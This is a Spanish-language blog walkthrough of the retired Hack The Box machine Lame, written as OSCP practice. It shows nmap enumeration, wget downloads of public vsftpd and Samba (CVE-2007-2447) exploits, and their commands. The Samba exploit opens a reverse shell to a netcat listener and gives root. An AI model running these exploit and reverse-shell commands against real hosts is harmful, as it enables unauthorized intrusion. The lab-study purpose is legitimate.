Avatar Blog Personal de K0Hack sobre Conceptos Hacking Etico // HTB // TryHackMe // Resumenes de Hacking // Herramientas para distintas tareas.

OSCP Path ~ Lame de Hack The Box (Necesario VIP)

HTB, OSCP Path, Samba, Maquinas Retiradas, Writeup, Hacking
Published on 09 Jun 2021

Lame ~ Hack The Box to OSCP

Realizamos el Primer escaneo con Nmap

$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.3       "

Procedemos con el siguiente escaneo de Nmap

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4										-comprobando version
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.193
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h01m27s, deviation: 2h49m45s, median: 1m24s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-05-03T17:06:20-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Comenzamos buscando en SAEARCHSPLOIT por las versiones de los servicios encontrados:

# searchsploit vsftpd 2.3.4           
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                |  Path
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                                        | unix/remote/17491.rb
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Encontramos que para la version 2.3.4 vsftpd hay un RCE buscamos a nivel de github porque solo aparecia uno RCE para su uso en Metasploit (NO PODEMOS USARLO) Asique buscamos por algun exploit igual pero en python para comprobar si funciona. Nos descargamos el siguiente exploit

# wget https://raw.githubusercontent.com/ahervias77/vsftpd-2.3.4-exploit/master/vsftpd_234_exploit.py 

# python3 vsftpd_234_exploit.py -h
Usage: ./vsftpd_234_exploit.py <IP address> <port> <command>
Example: ./vsftpd_234_exploit.py 192.168.1.10 21 whoami
                                                                                                                                                                                
β”Œβ”€β”€(rootπŸ’€kali)-[/home/…/HTB/OSCP/Lame/exploits]
└─# python3 vsftpd_234_exploit.py 10.10.10.3 21 whoami
[*] Attempting to trigger backdoor...
[+] Triggered backdoor
[*] Attempting to connect to backdoor...

β€”β€”β€”β€”β€”- NO NOS FUNCIONA β€”β€”β€”β€”β€”

Prodecemos a seguir enumerando con SEARCHSPLOIT el servicio SAMBA:

 # searchsploit samba 3.0.2
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                |  Path
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                                              | unix/remote/16320.rb
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Encontramos otro exploit posiblemente funcional pero para su uso con Metasploit, y nosotros no Usamos Metasploit, esta Prohibido para el OSCP. Vamos a buscar a nivel de github por algun exploit para la version de samba 3.0.2. Nos descargamos el siguiente exploit

 # wget https://raw.githubusercontent.com/amriunix/CVE-2007-2447/master/usermap_script.py

Procedemos a pasarle los datos que nos pide RHOST RPORT LHOST LPORT y nos ponemos a la escucha por el LPORT indicado con una session de netcat.

 # python3 usermap_script.py 10.10.10.3 139 10.10.14.5 443
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

Ejecutamos el Exploit usermap_script.py y recibimos una conexion como el usuario root directamente.

 # nc -vlnp 443
listening on [any] 443 ...
connect to [10.10.16.132] from (UNKNOWN) [10.10.10.3] 60661
script /dev/null -c bash
root@lame:/#

Sacamos las Flags: Para el user.txt:

 root@lame:/home/makis# cat user.txt
353f01d477d0f5b98e2b545d7xxxxxxxxx

Para el root.txt:

root@lame:/root# cat root.txt
70da9f983f2a6f92d0936a3aaxxxxxxxxx

related posts